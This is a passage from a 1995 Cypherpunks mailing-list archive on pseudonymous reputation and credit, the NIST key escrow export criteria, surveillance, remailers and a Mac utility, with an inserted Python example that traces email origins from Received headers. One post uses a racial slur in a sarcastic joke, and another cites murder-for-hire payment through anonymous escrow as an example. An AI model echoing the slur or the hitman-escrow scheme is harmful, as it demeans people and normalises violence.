>   ^^^^^^^^^^^^^^^^^^^^^^^^^^^
..
> ideally, one never "trusts" an agent with a transaction greater than the
> value of the reputation capital he will lose if he defaults.
..
> Whether cryptographic protocols (cf. the "encrypted open books" proposal by
> Eric Hughes for one approach which may be useful) solve this problem is not
> known at this time. But the non-crypto world has of course not solved this
> problem, either.

I've often thought that in a system of digital pseudonyms, where no-one need trade with a negative reputation (a reputation deficit?), something like Akerlof's Market for Lemons will arise, and _all_ pseudonyms will be treated as (reputationally) worthless.

[Akerlof, if I remember my economics right (and I am confident that I will be corrected if I don't) analysed a market for used cars. There were two types of cars: good ones, and lemons. A purchaser couldn't tell the difference until she had bought the car. Since the expected value of a used car was less than the value of a good car, purchasers wouldn't pay the good car price. But that would mean owners of good cars wouldn't offer them for sale (in this market). So the only cars for sale would be lemons :-)]

As Tim points out, this is a non-crypto problem as well, and devices such as bonds or (which are game-theoretically similar) expensive advertising or plush premises [if they spent an unrefundable $20million on the Rolling Stones, they're not likely to throw it all away by ripping you off for $100 ;-)] are used to convince potential customers of one's bona fides.

How these transfer to the world of cyber-finance, I'm not sure, but I suspect it leaves a role for True Names in the management of credit risk: as escrow agents, middlemen, clearing houses etc.
[Although, having said that, if the Akerlof analysis applies, you just *can't* grant (unsecured) credit to pseudonyms - the percentage of defaulters will be 100...]

But these Names are True only in the sense that they are juridically persistent (that is, if they transact today, they can be sued tomorrow), and need not be traceable to any True People (Warm Bodies?) - anonymously held corporations, for example.

If you can't rely on the unsecured promise of a digital pseudonym, and you can't accept reputation as 'security', how do you extend credit?

Dm

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEd+81lo3j8JHzalAQFo0AQAkohUuFg6QwRaY7X5LwF1YXCby1uCKQmI
FfmQHmEa55oeht9Vc4DN1V+dIGjVWRIxS3ib/oRYsXY9HWo8pI3gMKhbnsBf3OzN
jVuoUR8Tgx1HcX59uBjbpxKNHFw5U4gPN70zvbLJhbw1UHWr24tq5RJri22coCh7
1Dm016RMHns=
=rl4c
-----END PGP SIGNATURE-----

From dawagner at phoenix.Princeton.EDU Fri Sep 1 16:10:20 1995
From: dawagner at phoenix.Princeton.EDU (David A. Wagner)
Date: Fri, 1 Sep 95 16:10:20 PDT
Subject: Cryptanalysis of S-1
In-Reply-To:
Message-ID: <9509012308.AA17004@tucson.Princeton.EDU>

Ted_Anderson at transarc.com writes:
> Further we have a concrete design principle: the per-round sub-keys
> should not repeat.

Right. In fact, this design principle has been known for a long time: the earliest reference I know of is

@inproceedings{subkeys-important,
  author    = {Edna K. Grossman and Bryant Tuckerman},
  title     = {Analysis of a Weakened {Feistel}-like Cipher},
  booktitle = {1978 International Conference on Communications},
  pages     = {46.3.1--46.3.5},
  publisher = {Alger Press Limited},
  year      = {1978},
  annote    = {Feistel ciphers with identical subkeys in each round are very weak}
}

-------------------------------------------------------------------------------
David Wagner                                             dawagner at princeton.edu

From tcmay at got.net Fri Sep 1 16:51:13 1995
From: tcmay at got.net (Timothy C.
May) Date: Fri, 1 Sep 95 16:51:13 PDT Subject: Surveillance a Growing Problem Message-ID: (I've changed the thread name from "Fuhrman...." to the topic being discussed here.) At 10:56 PM 9/1/95, Buford Terrell wrote: >If you've ever watched Not_at_all_Funny Home Videos or any of the >American Urinal school of tabloid television, you soon start feeling >that the real threat to privacy is not the guvmint, but all of >the yoyos with their little cam corders running around pointing them >at people. > >Security cameras in ATMS and at airline ticket counters do more >to threaten you privacy than do FIBBIE wiretaps, and PGP won't >protect you from them. (and usually neither will the courts). I absolutely agree with this, though this doesn't mean I'll stop worrying about the government's plans for key escrow (GAK), about limits on key lengths, or about other efforts to thwart strong security. But clearly the "technologies of surveillance," ranging from massively-cross-correlated mailing lists to smaller and cheaper and more ubiquitous video cameras, are very nearly an equal threat. (Lots of issues, from the nearly universal requests for Social Security Numbers, to the growing powers of courts to compel the disclosure of private documents, to, well, you folks all know the trends.) Folks like us should not be lobbying for limitations on what other private individuals or companies are doing, but should concentrate first, on technological alternatives (encryption, unlinkable credentials, digital money, that sort of thing) and second, on educating others that security and privacy is best self-arranged and is rarely accomplished by government assuming the role of protector. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. 
May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From tcmay at got.net Fri Sep 1 17:07:53 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 1 Sep 95 17:07:53 PDT Subject: A problem with anonymity Message-ID: At 10:45 AM 9/2/95, David Murray wrote: >I've often thought that in a system of digital pseudonyms, where no-one need >trade with a negative reputation (a reputation deficit?), something like >Akerlof's Market for Lemons will arise, and _all_ pseudonyms will be treated >as (reputationally) worthless. Doubtful, as we already have evidence that people are treating some digital pseudonyms as reputationally valuable. Examples abound. >[Akerlof, if I remember my economics right (and I am confident that I will >be corrected if I don't) analysed a market for used cars. There were two >types of cars: good ones, and lemons. A purchaser couldn't tell the difference >until she had bought the car. Since the expected value of a used car was less >than the value of a good car, purchasers wouldn't pay the good car price. >But that would mean owners of good cars wouldn't offer them for sale (in >this market). So the only cars for sale would be lemons :-)] I haven't encountered this example, but it clearly misses some important real-world issues. First, people buying used cars are strongly advised to take the car to an independent mechanic to be checked out (a kind of variant of the "cut-and-choose" protocol at work). This often reveals lemons. Second, people take test drives, look under the hood, kick the tires, etc. This also often reveals lemons. Third, the reputation of the used car dealer is, despite nearly a century of jokes to the contrary, often very important. 
The last two cars I've bought I bought used--albeit with low mileage on each--from car dealers. I took test drives and got a limited warranty in each case. The first car I drove for 12 years with essentially no problems, the second I've been driving for almost 3 years. Like a lot of simple game-theoretic models, the application to the real world is quite different. But I certainly agree that crypto will reignite interest in analyses of such game theory questions. Another way of viewing anonymity vs. non-anonymity is that knowing the True Name of a party with whom one trades is just _one element_ of a transaction. By no means is it essential. (Think of various trading situations where one has no idea of the True Name of the other parties: cash-and-carry transactions, flea markets, many international trade arrangements, etc. As we have discussed in past discussions of anarchy, the international trading regime is essentially an anarchy, in that no Higher Authority exists to resolve disputes in a top-down way...the so-called "Law Merchant" evolved to resolve disputes in such trading situations.) >As Tim points out, this is a non-crypto problem as well, and devices such as >bonds or (which are game-theoretically similar) expensive advertising or >plush premises [if they spent an unrefundable $20million on the Rolling >Stones, they're not likely to throw it all away by ripping you off for >$100 ;-)] are used to convince potential customers of one's bona fides. > >How these transfer to the world of cyber-finance, I'm not sure, but I suspect >it leaves a role for True Names in the management of credit risk: as escrow >agents, middlemen, clearing houses etc. [Although, having said that, if the >Akerlof analysis applies, you just *can't* grant (unsecured) credit to >pseudonyms - the percentage of defaulters will be 100...] 
> But these Names are
> True only in the sense that they are juridically persistent (that is, if
> they transact today, they can be sued tomorrow), and need not be traceable
> to any True People (Warm Bodies?) - anonymously held corporations, for
> example.
>
> If you can't rely on the unsecured promise of a digital pseudonym, and you
> can't accept reputation as 'security', how do you extend credit?

I am willing to extend some amount of credit to PrOduct Cypher, Black Unicorn, etc., based on their past reputation and on the fact that I can show to others the transactions into which their pseudonyms entered and thus expose them if they default. Now _how much_ I'm willing to extend is of course a more complicated issue, but the principle is still there: a purely digital pseudonym, with no possibility of being tied to a True Name, can still be extended credit....I just said I would do so.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From adwestro at ouray.cudenver.edu Fri Sep 1 17:19:06 1995
From: adwestro at ouray.cudenver.edu (Alan Westrope)
Date: Fri, 1 Sep 95 17:19:06 PDT
Subject: Phil Zimmermann/Amnesty International?
In-Reply-To:
Message-ID:

On Fri, 01 Sep 1995, Michael Froomkin wrote:
> I think he would have to be charged first. Have I missed something?
> PS when does the statute of limitations run out?

June '96. Zimmermann and Dubois appeared on a local talk radio show recently; a friend happened to catch the program, taped it, and played excerpts at a Cypherpunks meeting. This date was mentioned by Phil Dubois.
Alan Westrope      __________/|-,
                  (_)   \|-'      2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43  7C CA 6D 57 29 25 69 23

From monty.harder at famend.com Fri Sep 1 17:46:10 1995
From: monty.harder at famend.com (MONTY HARDER)
Date: Fri, 1 Sep 95 17:46:10 PDT
Subject: A problem with anonymity
Message-ID: <8B04409.00030003D4.uuout@famend.com>

TC> This is one thing that _bonding_ is designed to partially ameliorate. One
TC> posts a bond which is greater than the amount being carried, or at least is

A variation of a bond is an escrow agent....

Overload Alert: I use "escrow" here in the more mundane sense of the folks who collect your real estate taxes and homeowners' insurance from you 1/12th at a time along with your mortgage payment, for instance.

If the buyer has a =nonymous= agent to receive the payment, which is only released to the seller upon proof(s) of performance (whether in lump sum or on a schedule of staged payments tied to specific milestones in a long-term project) then the buyer has someone to go after in the event of such shenanigans.

TC> There are still scams and maneuvers to thwart this reputation capital
TC> scheme. The agent planning to "defect" (default, split, abscond, renege,
TC> etc.) can try to pile up as many pending transactions as possible,
TC> anticipating that the various transactees will be unaware of each other.

And the escrow method dynamically scales to meet this threat, whereas the bond is static. Of course, the escrow agent will extract his pound of flesh, just as any other form of insurance. Such is the nature of life.

 * A Liberal puts your money where his mouth is.
---
 * Monster at FAmend.Com *

From hayden at krypton.mankato.msus.edu Fri Sep 1 17:50:45 1995
From: hayden at krypton.mankato.msus.edu (Robert A. Hayden)
Date: Fri, 1 Sep 95 17:50:45 PDT
Subject: Phil Zimmermann/Amnesty International?
In-Reply-To:
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 1 Sep 1995, Michael Froomkin wrote:
> I think he would have to be charged first. Have I missed something?
> PS when does the statute of limitations run out?

I'm assuming that the statute of limitations has run out on most of these things (I don't know CA law, except to know it's weird :-)

What I'm concerned about, and nobody seems to have picked up on it, is that one of the transcripts said that he and a partner beat up a bunch of perps after they tried to surrender and that one of them died(!!). That's murder in my book, and there is no statute of limitations on that, even in California...

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMEeOOzokqlyVGmCFAQHB1gP/bGIG1BqSiM7Fmc1H4fEU3Osg/wwBz31T
5sjms6JX9Z5ekW/oL4I3QDnqrW5GiMfWHdJDRNhYU2cQx0+8V6V8muiah/GO/q+P
8v1Hg0nqYW0yBCROrD/S3kfjLViqCfHWo7S5/T9pjDnF3Dq8KT5tRrAKZrTQVfKL
B9ZhTLqqwXk=
=eFZv
-----END PGP SIGNATURE-----

____        Robert A. Hayden <=> hayden at krypton.mankato.msus.edu
\ /__       Finger for Geek Code Info <=> Finger for PGP Public Key
 \/ /       -=-=-=-=-=- -=-=-=-=-=-
  \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+
K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++>(+)$ Y++ PGP++ t- 5+++ X++
R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y++**
------END GEEK CODE BLOCK------

From hayden at krypton.mankato.msus.edu Fri Sep 1 17:51:13 1995
From: hayden at krypton.mankato.msus.edu (Robert A. Hayden)
Date: Fri, 1 Sep 95 17:51:13 PDT
Subject: Phil Zimmermann/Amnesty International?
In-Reply-To:
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 1 Sep 1995, Michael Froomkin wrote:
> I think he would have to be charged first. Have I missed something?
> PS when does the statute of limitations run out?

ARGH! Shit. I got my threads confused, thought this was about Fuhrman and the OJ Circus.
It's been a long week. Sorry folx.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMEeOcjokqlyVGmCFAQGz2QP+IVwINZmPIQ14Kx4GpMJqjLNTWZba87cc
3QhQxbDQMD5CCSbqGsMyQ899jm/lUxdglBmMvjGIz85uSyg9b5gIinyfKs3lZKFd
ilICPOJ49r/C/wH2CaokuDCFtSOGLdOL2M7tpV+zNKiUtIk4vbm34T4COvnjy+g1
z3MZsDpSugY=
=M7M5
-----END PGP SIGNATURE-----

____        Robert A. Hayden <=> hayden at krypton.mankato.msus.edu
\ /__       Finger for Geek Code Info <=> Finger for PGP Public Key
 \/ /       -=-=-=-=-=- -=-=-=-=-=-
  \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+
K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++>(+)$ Y++ PGP++ t- 5+++ X++
R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y++**
------END GEEK CODE BLOCK------

From hallam at w3.org Fri Sep 1 17:58:17 1995
From: hallam at w3.org (hallam at w3.org)
Date: Fri, 1 Sep 95 17:58:17 PDT
Subject: Phil Zimmermann/Amnesty International?
In-Reply-To:
Message-ID: <9509020057.AA17337@zorch.w3.org>

I think that two Amnesty policies are being confused. Amnesty does protest on behalf of prisoners of conscience in all countries. It also has a rule which means that a group making a protest should come from outside the country concerned; this is a sensible means of preventing Amnesty becoming a vehicle for partisan protests. They have similar rules for when they send observers etc.

I don't think that Phil necessarily has to be arrested though. Amnesty might well wish to send someone to the trial to act as an observer.

Phill

From tcmay at got.net Fri Sep 1 18:13:57 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 1 Sep 95 18:13:57 PDT
Subject: A problem with anonymity
Message-ID:

At 10:12 PM 9/1/95, MONTY HARDER wrote:
>TC> This is one thing that _bonding_ is designed to partially ameliorate.
>TC> One
>TC> posts a bond which is greater than the amount being carried, or at least is
>
> A variation of a bond is an escrow agent....
>
> Overload Alert: I use "escrow" here in the more mundane sense of
> the folks who collect your real estate taxes and homeowners'
> insurance from you 1/12th at a time along with your mortgage
> payment, for instance.
>
> If the buyer has a =nonymous= agent to receive the payment, which is
> only released to the seller upon proof(s) of performance (whether in
> lump sum or on a schedule of staged payments tied to specific milestones
> in a long-term project) then the buyer has someone to go after in the
> event of such shenanigans.

Oh, I agree, of course. Except that the escrow agent need not be a "nonymous" agent, to use Monty's terminology here. The third party escrow agent can of course be a digital pseudonym. (As I keep saying, having the True Name--whatever that means these days--is only one facet, one factor of the overall equation. In some cases, very important, in other cases, less important.)

The canonical--if morbid--example is the "Al's Murder Escrow" agent. Al holds the digital money (deposited anonymously, etc.) and doesn't pay the hitter until certain conditions are met. (Chaum has schemes to partly deal with this, but "money mixes" eliminate traceability, but may introduce other issues.)

There are of course issues involving the escrow agent deciding not to pay, etc. But most escrow services, like banks, make more money by staying in business than by defrauding customers.

(I mention banks because, when you look at it closely, today's banks can quite easily claim that a customer made a withdrawal when he didn't. That they don't says more about the nature of persistent businesses than about any government oversight or security features. This is a side point, but it bears keeping in mind that the real world of banks and businesses, etc., is not fully secure, either. And yet it mostly works pretty well.
The reasons for this are interesting to consider.) --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From nobody at REPLAY.COM Fri Sep 1 18:30:25 1995 From: nobody at REPLAY.COM (Anonymous) Date: Fri, 1 Sep 95 18:30:25 PDT Subject: Key Escrow Workshop agenda & discussion paper 3 Message-ID: <199509020130.DAA17812@utopia.hacktic.nl> Key Escrow Workshop agenda & discussion paper 3 September 1, 1995 Dear Participant: Thank you for agreeing to participate in the two-day meeting on software key escrow encryption. We are anxious to work with you and other industry representatives to facilitate development of exportable key escrow encryption in software products. I look forward to the workshop being an important step in that process. I have attached a draft agenda for the two days. I propose that we spend the majority of our time discussing a set of export criteria. In order to move that discussion along, a draft set of criteria is attached. The criteria state, in general terms, the government's needs with respect to exportable software, consistent with its law enforcement and national security requirements. Since it is important that the final criteria be clear, straightforward, consistent, and implementable, Mike Nelson of the Office of Science and Technology Policy will spend a few minutes describing these criteria on the first morning of the meeting. After that, we would like to hear your perspectives on them and work with you to refine them. On the second day, we plan to discuss the export licensing process for such products, and begin exploring characteristics of acceptable key escrow agents. 
Again, thank you for your participation. I look forward to seeing you there. Sincerely, / s / Raymond G. Kammer Deputy Director Attachments -------------------------------------------------------- TENTATIVE AGENDA Key Escrow Issues Meeting September 6-7, 1995 National Institute of Standards and Technology Gaithersburg, Maryland Wednesday, September 6, 1995 9:00 Welcome, Agenda Overview, Logistics Ed Roback, NIST 9:10 Review of Meeting Goals Ray Kammer, NIST Deputy Director Session I -- Software Key Escrow Exportability Criteria 9:20 Briefing -- Discussion Draft of Software Key Escrow Export Criteria Michael Nelson, Office of Science and Technology Policy 10:00 Industry Perspectives on Exportability Criteria (Industry briefings/reactions 5-10 minutes max.) 10:45 Break 11:00 Industry Perspectives on Exportability Criteria, continued. 11:45 Discussion of Breakout Session Tasks At registration, you will be asked to sign up for a breakout session. Groups A1, A2: Criterion #2 Groups B1, B2: Criteria #3, 4, 9 Groups C1, C2: Criteria #5, 6 Groups D1, D2: Criteria #7, 8 Criterion #10 is the subject of Session II, and criterion #1 (64-bit) is straight-forward. Breakout room assignments will be announced at this time. 12:00 Lunch (on own, cafeteria available) 1:00 Breakout session #1 Groups will be asked to: 1) determine whether each criterion is clear and, if not, propose appropriate modifications; 2) identify issues (which may arise from the criteria assigned to the group) which need to be addressed, and by whom; and 3) develop technical ideas/approaches for achieving each criterion. 3:00 Break 3:15 Plenary -- Reports from Breakout Session #1 4:00 Breakout Session #2 Participants will be asked to select either a technical or criteria-focused group. Technical groups are asked to: 1) synthesize the proposed technical approaches (just presented in plenary) and identify/discuss the most promising approaches. 
Criteria focused groups are asked to: 1) look at all criteria and the comments/issues raised and propose ways to reconcile any differences; and 2) prioritize the issues that remain to be addressed, if any, for each criterion. 5:00 End of day Thursday, September 7, 1995 9:00 Plenary -- Reports from Breakout Session #2 9:45 Export Licensing Process Randy Williams, U.S. Dept. of Commerce Dan Cook, U.S. Dept. of State 10:15 Questions / Discussion 10:30 Break Session II -- Desirable Characteristics for Key Escrow Agents 10:45 Panel: Government Perspectives on Key Escrow Agent Issues Geoff Greiveldinger, U.S. Dept. of Justice Ray Kammer, NIST Penny Brummitt, NSA 11:30 Industry Perspectives on K.E. Agent Issues 12:30 Lunch (on own, cafeteria available) 1:30 Breakout Session #3 Each group is asked to identify proposed key criteria for desirable escrow agents. Same groups and room assignments as Breakout session #1. 2:45 Break 3:00 Plenary - Report of Breakout Sessions Session III -- Other Related Issues 3:30 Other Issues This is an opportunity for participants to raise related key escrow issues. 4:30 Follow-up Issues & Wrap-up 4:45 Adjourn Note: The meeting will be open to the public, although seating is limited. Advance registration is requested, please contact Arlene Carlton on 301/975-3240, fax: 301/948-1784 or e-mail: carlton at micf.nist.gov. _ _ _ 9/1/95 -------------------------------------------------------- Key Escrow Issues Meeting, September 6-7, 1995 Discussion Paper #3 Export Criteria Discussion Draft -- 64-bit Software Key Escrow Encryption As discussed at the SPA/AEA meeting on August 17, 1995, the Administration is willing to allow the export of software encryption provided that the products use algorithms with key space that does not exceed 64 bits and the key(s) required to decrypt messages/files are escrowed with approved escrow agents. On the same date, the September 6-7 key escrow issues meeting at NIST was also announced. 
The two principal topics at the meeting will be: 1) discussion of issues of exportability of 64-bit software key escrow encryption and 2) desirable characteristics for key escrow agents. In order to help make most productive use of the limited time available at the upcoming meeting and to better focus deliberation, the following criteria are being distributed for discussion purposes. Since it is important that final criteria be clear, straightforward, consistent, and implementable, please review these draft criteria and be prepared to discuss how they may be refined and made more specific.

Draft Export Criteria for Software Key Escrow Encryption

Software key escrow encryption products meeting the following criteria will be granted special export licensing treatment similar to that afforded other mass-market software products with encryption.

1. The product will use an unclassified encryption algorithm (e.g., DES, RC4) with a key length not to exceed 64 bits.

2. The product shall be designed to prevent multiple encryption (e.g., triple-DES).

3. The key required to decrypt each message or file shall be accessible through a key escrow mechanism in the product, and such keys will be escrowed during manufacture in accordance with #10. If such keys are not escrowed during manufacture, the product shall be inoperable until the key is escrowed in accordance with #10.

4. The key escrow mechanism shall be designed to include with each encrypted message or file, in a format accessible by authorized entities, the identity of the key escrow agent(s), and information sufficient for the escrow agent(s) to identify the key or key components required to decrypt that message.

5. The product shall be resistant to any alteration that would disable or circumvent the key escrow mechanism, to include being designed so that the key escrow mechanism cannot be disabled by a static patch, (i.e., the replacement of a block of code by a modified block).

6.
The product shall not decrypt messages or files encrypted by non-escrowed products, including products whose key escrow mechanisms have been altered or disabled. 7. The key escrow mechanism allows access to a user's encrypted information regardless of whether that user is the sender or the intended recipient of the encrypted information. 8. The key escrow mechanism shall not require repeated involvement by the escrow agents for the recovery of multiple decryption keys during the period of authorized access. 9. In the event any such product is or may be available in the United States, each production copy of the software shall either have a unique key required for decrypting messages or files that is escrowed in accordance with #10, or have the capability for its escrow mechanism to be rekeyed and any new key to be escrowed in accordance with #10. 10. The product shall accept escrow of its key(s) only with escrow agents certified by the U.S. Government or by foreign governments with which the U.S. Government has formal agreements consistent with U.S. law enforcement and national security requirements. Note: Software products incorporating additional encryption methods other than key escrow encryption methods will be evaluated for export on the basis of each encryption method included, as is already the case with existing products. Accordingly, these criteria apply only to the key escrow encryption method incorporated by a software product, and not to other non-escrowed encryption methods it may incorporate. For instance, non-escrowed encryption using a key length of 40 bits or less will continue to be exportable under existing export regulations. - - - Please also review discussion paper #1 (distributed earlier), which raises a number of issues involving exportability criteria and how exportable products could be designed. Discussion paper #2 (also previously distributed) presents questions involving key escrow agents. 
Note: These issues will be discussed at the Key Escrow Issues Meeting to be held September 6-7, 1995 (9:00 a.m. - 5:00 p.m.) at the National Institute of Standards and Technology (Gaithersburg, Maryland). The meeting will be open to the public, although seating is limited. Advance registration is requested, please contact Arlene Carlton on 301/975-3240, fax: 301/948-1784 or e-mail: carlton at micf.nist.gov. 9/1/95 From tcmay at got.net Fri Sep 1 18:51:13 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 1 Sep 95 18:51:13 PDT Subject: Macintosh Users: "SpeedDoubler" Message-ID: For you Macintosh users, I thought I'd share with you my experiences with SpeedDoubler, a new utility that (effectively) doubles or even triples performance of many applications that still are heavily dependent on 68K code (as opposed to purely PowerPC code). My PowerMac 7100av is currently running at 80 MHz, with a 512K L2 cache, and 40 MB of physical RAM. (I can remember when 32K of "core" was a huge amount, and I can remember when Intel supplied 8 MB to CDC for their "Plato" system...at that time, one of the largest solid state memory installations ever.) SpeedDoubler, from Connectix, is a $60-70 (street) product that takes 68K code and makes various optimizations for the PPC. It's effectively the 68K emulator that Apple should have provided. (For you non-Mac users who are reading this, this technology of intercepting and translating code, is likely to be used to get higher performance out of code written ostensibly for one CPU but actually run on a later iteration of the processor. Such as the Pentium or P6 in running 16-bit code.) In Speedometer, I saw a 3.9x increase in "CPU"-related tasks (for 68K code), and a 2.4x increase in a SmalltalkAgents application which is only available at this time in 68K code form. Even the Finder runs faster, as various parts of it are still written in 68K code. 
So, as many programs are still in 68K code form, and not yet rewritten for the PPC, SpeedDoubler effectively gives you a machine that is almost twice as fast. There may be a few incompatibilities, and I would suggest you read comp.sys.mac.apps and other groups to verify that your critical apps are not having any problems. All I can say is that I'm very happy. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From tcmay at got.net Fri Sep 1 19:12:02 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 1 Sep 95 19:12:02 PDT Subject: Phil Zimmermann/Amnesty International? Message-ID: At 12:50 AM 9/2/95, Robert A. Hayden wrote: >-----BEGIN PGP SIGNED MESSAGE----- > >On Fri, 1 Sep 1995, Michael Froomkin wrote: > >> I think he would have to be charged first. Have I missed something? >> PS when does the statute of limitations run out? > >I'm assuming that the statute of limitations has run out on most of these >things ( I don't know CA law, except to know it's weird :-) >What I'm concerned about, and nobody seems to have picked up on it, is >that one of the transcripts said that he and a partner beat up a bunch of >perps after they tried to surrender and that one of them died(!!). >That's murder in my book, and there is non statute of limitations on >that, even in California... Zimmermann and which partner? If it was Charlie Merritt, then all I can say is that I'm surprised. Kelly Goen...now there's a possibility. --Tim May P.S. As the thread title--"Re: Phil Zimmermann/Amnesty International?"--suggests, Phil Z. is the subject being discussed. 
Gary Jeffers made the bizarre speculation that Amnesty International might want to consider Phil a "prisoner of conscience" or a "political prisoner," or somesuch. All Michael Froomkin and others of us were pointing out is that this would be rather difficult, given that Phil has not even been charged, let alone tried, let alone imprisoned.

How Mark Fuhrman migrated into this thread is beyond me. But, then, he killed Ron and Nicole, planted the glove to frame the nigger he hated so much, and was also involved in the bombing of the WTC. That he helped Phil export PGP is thus not surprising.

From robo at c2.org Fri Sep 1 19:36:18 1995
From: robo at c2.org (ROBO Mixmaster Remailer)
Date: Fri, 1 Sep 95 19:36:18 PDT
Subject: Direct Socket to Remailer?
Message-ID: <199509020225.TAA29123@infinity.c2.org>

I've heard of telnetting to port 25 to send SEMI-untraceable e-mail. The procedure, quite frankly, sounds rather complicated.

Most of my mail that I don't want traced goes through the Mixmaster remailer network. I'm using Winsock-compatible software via a PPP connection. Is it possible, for example, to tell my mailer software to use the remailer itself, such as "remail.obscura.com" as the mail host, rather than "mail.myISP.com"? Will it work, at least for sending, without having an account at "obscura.com", or whatever remailer? Would that be less traceable than sending it through my ISP's mail host?
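The traceability question in the post above, seen from the receiving side, as an added example that is not part of the original thread: a small walker over a message's Received: lines that shows which mail host actually recorded the submitting address. The headers are constructed (modelled on the relay chains quoted elsewhere in this archive) and every host name and address in them is a placeholder.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Set

# Constructed sample headers for this example; hosts and addresses are placeholders.
# Each MTA prepends its own Received: line, so the top line is the last hop.
SAMPLE_HEADERS = """\
Received: from relay.example.net (relay.example.net [192.0.2.10])
\tby mail.destination.example (8.6.9/8.6.x) with SMTP id TAA08164
\tfor <bob@destination.example>; Fri, 1 Sep 1995 19:09:54 -0400
Received: from remail.example.org by relay.example.net id aa06599; 1 Sep 95 16:20 EDT
Received: from ppp-dialup-17.isp.example (198.51.100.17) by remail.example.org via smap (g3.0.1)
\tid xma004617; Fri, 1 Sep 95 16:07:54 -0400
From: nobody@remail.example.org
Subject: test
"""

# "from <name>" followed by an optional parenthesised part; the parenthesised part is
# what the receiving MTA writes from the TCP connection, the bare name is what the
# sending side announced and can be anything.
FROM_RE = re.compile(r"\bfrom\s+([^\s(]+)\s*(?:\(([^)]*)\))?", re.I)
BY_RE = re.compile(r"\bby\s+([^\s;(]+)", re.I)
IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")


@dataclass
class Hop:
    claimed_from: str       # name the connecting side announced
    peer_ip: Optional[str]  # address the stamping MTA saw on the wire, if it recorded one
    stamped_by: str         # MTA that added this Received: line


def unfold(raw: str) -> List[str]:
    """Join RFC 822 continuation lines (leading whitespace) onto their header line."""
    lines: List[str] = []
    for line in raw.splitlines():
        if line[:1] in (" ", "\t") and lines:
            lines[-1] += " " + line.strip()
        else:
            lines.append(line)
    return lines


def parse_hops(raw: str) -> List[Hop]:
    """Return the Received: hops in delivery order (first hop first)."""
    hops: List[Hop] = []
    for line in unfold(raw):
        if not line.lower().startswith("received:"):
            continue
        m_from, m_by = FROM_RE.search(line), BY_RE.search(line)
        if not (m_from and m_by):
            continue
        # Only trust an address from the parenthesised part, which the MTA itself wrote.
        ip = IP_RE.search(m_from.group(2) or "")
        hops.append(Hop(m_from.group(1), ip.group(1) if ip else None, m_by.group(1)))
    hops.reverse()
    return hops


def origin_as_seen_by(hops: List[Hop], trusted: Set[str]) -> Optional[str]:
    """Peer address recorded by the earliest hop stamped by an MTA you trust.

    `trusted` holds lower-case host names. Lines stamped before the first trusted
    MTA travelled inside the message body of the submission and may be forged.
    """
    for hop in hops:
        if hop.stamped_by.lower() in trusted and hop.peer_ip:
            return hop.peer_ip
    return None


if __name__ == "__main__":
    chain = parse_hops(SAMPLE_HEADERS)
    for hop in chain:
        print(f"{hop.stamped_by} accepted from {hop.claimed_from} ({hop.peer_ip})")
    print("remailer host sees:", origin_as_seen_by(chain, {"remail.example.org"}))
    print("recipient host sees:", origin_as_seen_by(chain, {"mail.destination.example"}))
```

On the constructed headers only the host that accepted the connection (here the remailer's own MTA) holds the dial-up address; the recipient's MTA sees nothing closer than the relay, which is why submitting straight to a remote port 25 moves the record rather than removing it.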
From rsalz at osf.org Fri Sep 1 20:02:30 1995
From: rsalz at osf.org (Rich Salz)
Date: Fri, 1 Sep 95 20:02:30 PDT
Subject: IETF security report
Message-ID: <9509020301.AA17722@sulphur.osf.org>

>From saag-request at neptune.tis.com Fri Sep 1 19:09:55 1995
Received: from TIS.COM (neptune.tis.com [192.94.214.96]) by postman.osf.org (8.6.9/8.6.x) with SMTP id TAA08164 for ; Fri, 1 Sep 1995 19:09:54 -0400
Received: from neptune.tis.com by neptune.TIS.COM id aa06599; 1 Sep 95 16:20 EDT
Received: from relay.tis.com by neptune.TIS.COM id aa06595; 1 Sep 95 16:18 EDT
